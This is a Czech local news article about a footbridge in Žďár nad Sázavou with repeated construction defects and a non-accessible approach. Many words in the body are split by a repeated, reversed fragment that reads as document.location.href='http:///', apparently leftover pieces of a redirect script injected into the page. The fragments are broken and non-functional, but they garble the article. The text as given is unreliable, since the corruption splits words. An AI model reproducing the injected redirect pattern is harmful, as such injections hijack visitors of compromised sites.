Rainbow page separator

Lávka ve Farských humnech má další závadu, není bezbariérová

Úterý, 6. července 2021

Žďár nad Sázavou / Další reklamací projde zánovní lávka přes Sázavu ve Farských humnech. Poté, co se u přemostění, které chodci i cyklisté využívají od loňského září, nejdříve opravovalo opačně našroubované zábradlí, díky čemuž si hlavně od vodáků získalo nelichotivou přezdívku žďárská gilotina, při opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovné montáži dělníci „zapomněli“ na šrouby. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože jim díky pružné „pohybující se“ mos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce původní otvory pro šrouby nelícovaly, zábradlí jednoduše přivařili. Žďárská radnice pak zareagovala na četné podněty veřejnosti pozastavující se nad množstvím děr bez šroubů, případně s jinými, menšími, které do děr očividně nepatřily, a nová lávka byla v rámci reklamace opět opravena.
Lidé však při jejím používání záhy zaznamenali další závadu. Lávka pro pěší a cyklisty za bezmála čtyři miliony korun, která je navržena a prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována jako bezbariérová, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nesplňuje, přičemž vozíčkáři mají s najetím na přemostění značný problém. Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že napojení asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové plochy na most neodpovídá normám, bude v rámci dalšího reklamačního řízení opraveno. Současně dojde i k novénu nátěru zábradlí, který byl poškozen při předešlých opravách.